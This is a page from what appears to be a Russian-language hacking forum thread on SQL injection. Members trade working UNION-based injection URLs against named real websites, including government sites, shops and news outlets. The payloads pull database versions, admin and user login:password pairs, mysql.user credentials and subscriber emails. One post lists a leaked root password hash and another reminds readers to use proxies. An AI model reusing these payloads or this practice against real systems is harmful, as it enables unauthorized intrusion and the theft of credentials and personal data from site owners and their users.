SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    боян :)

    а вот от меня, к сожалению 3 версия скорее всего

    Code:
    http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+4/*
    http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+8/*
    http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+9/*
    http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+AND+ascii(lower(substring(version(),1,1)))=52/*
    здесь ничего интересного:
    Code:
    http://www.iwdp.co.uk/profile.php?id=-220+union+select+1,name,3,4,5,6,7,8,9,10,11+from+regions/*
    здесь не смог сделать вывод (название знакомое, кажется уже ковырял эту скулю)
    Code:
    http://www.biodiversityscotland.gov.uk/pageType1.php?id=2&type=1&navID=-27+union+select+1,2,3,4,5,6/*
     
    #1581 Thanat0z, 3 Apr 2007
    Last edited: 3 Apr 2007
    2 people like this.
  2. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    2Thanat0z
    /me смеялся =)

     
    1 person likes this.
  3. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.no2anticommunism.org/ru/index.php?info=doc&Id=-40+union+select+1,passwd,3,4,5,6,7,8,9,10,11,12+from+users/*
    Code:
    http://socdvig.org.ru/index.php?action=viewnews&id=-31+union+select+1,2,3,4,5,6,7+from+users/*
     
    1 person likes this.
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Сайт http://www.singletrackworld.com/ Одна большая скуль инъекция.
    Inj:
    Одна колумна, таблица users. Мускул версии 5.0.22 (Весь вывод в title)
    Теперь через лимит дёргаем пассы.
    add:

    Звёздочку поставил, ибо на первом месте стоит походу не админ. Дальше уже перебором.=]
     
    #1584 .Slip, 3 Apr 2007
    Last edited: 3 Apr 2007
    1 person likes this.
  5. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    лимит вывод ограничивает, а то скрипт наровит всё вывести.
    а тут просто мыла

    жалко только до данных моделей чёт не смог добраться
     
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    пфф, вы название темы видели? =\
     
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(user(),char(58),version())/*
    http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(login,char(58),pass)+from+users+limit+0,1/*
    Code:
    http://www.info-shop.ru/index.php?idk=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(database(),char(58),user(),char(58),version()),13/*
    Code:
    http://www.vzamen.ru/index.phtml?act=lot_list&title=cat_list&cat_id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*
    Code:
    http://www.globussalon.ru/detail.php?chapId=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
     
  8. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    черт, я более 3 недель скулей не искал, вообще не внимателен, раз там 4 версия, покажите мне юнион ;)

    да, туплю я :) всегда делал скуль с первой переменной, а тут чет подумал сделать со второй, ради разнообразия :) не знал что от этого ничего не происходит ;) Век живи, век учись
     
    #1588 Thanat0z, 3 Apr 2007
    Last edited: 3 Apr 2007
    5 people like this.
  9. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.spe-moscow.org/ru/news/index.php?id=-36+union+select+1,2,3,4,database()/*
    Code:
    http://recycling.org.ru/modules/event/index.php?op=show&id=-5+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5/*
     
    1 person likes this.
  10. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Можете объяснить что тут не так? Запрос к базе там такой стоит, или order+by в этой базе работает не так как обычно? =/
     
  11. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://www.sport.com.ua/vote.phtml?id=-180+union+select+concat(username,char(58),password),2+from+users/*
     
  12. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    расшивровываем и ищем админку ;)
    Code:
    http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),password)+from+admin/*
    ну на кройняк можно и на форум напасть ;)
    Code:
    http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password)+from+phpbb_users+limit+4,1/*
     
    2 people like this.
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(user(),char(58),version()),5,6,7,8/*
    http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(login,char(58),password),5,6,7,8+from+user+limit+0,1/*
    Code:
    http://www.komus-opt.ru/news.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*
     
    3 people like this.
  14. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    shop
    Code:
    http://www.berneboek.com/shop/product.php?id=-2691+union+select+1,password,3,4+from+users/*
     
    3 people like this.
  15. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.daymusic.ru/announce.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
    доступ к мускл.юзер был, потом исчез о_0
     
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    mnr.gov.ru Вытянул мыло подписчиков, логин, пароль, мыло пользователей.

    Code:
    http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4/*
    http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(user,char(58),password),3,4+from+mysql.user+limit+0,1/*
    http://www.mnr.gov.ru/part/?pid=-1+union+select+1,email,3,4+from+subscribe+limit+0,1/*
    http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password,char(58),email),3,4+from+users+limit+0,1/*
    Не забываем юзать прокси!

    Code:
    http://www.kharkov-sport.com/news.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/*
     
    #1596 Grey, 3 Apr 2007
    Last edited: 3 Apr 2007
    3 people like this.
  17. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Бгга =)

    http://les.mnr.gov.ru

    Code:
    http://les.mnr.gov.ru/part/?act=more&id=1432&pid=-1+union+select+concat(login,char(58),password),2+from+users/*
    http://voda.mnr.gov.ru

    Code:
    http://voda.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password),3,4+from+users/*
     
    3 people like this.
  18. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Какие то там пилоты. http://www.calpilots.org/
    11 column, table: mysql.user
    user,password
    root:161de26c23c0854e
     
    3 people like this.
  19. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Седня слабенько(( Турагентсво.

    И аватарки (выводится только двойка, между банерами)

     
    #1599 Fr-Ron, 3 Apr 2007
    Last edited: 3 Apr 2007
  20. ssk.ex0.uf0

    ssk.ex0.uf0 Elder - Старейшина

    Joined:
    27 Feb 2007
    Messages:
    68
    Likes Received:
    19
    Reputations:
    0
    Мимо надписи "France opens secret UFO files covering 50 years" несмог равнодушной пройти =)
    Code:
    http://www.breitbart.com/article.php?id=1'+union+select+1,2,DATABASE(),4,5,6,USER(),8,9,10,11,12/*
    А вот если на запрос:
    Code:
    http://www.breitbart.com/article.php?id=1'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+mysql.user/*
    Отвечает "Access denied" всё вилы?(
     
    #1600 ssk.ex0.uf0, 3 Apr 2007
    Last edited: 3 Apr 2007
Thread Status:
Not open for further replies.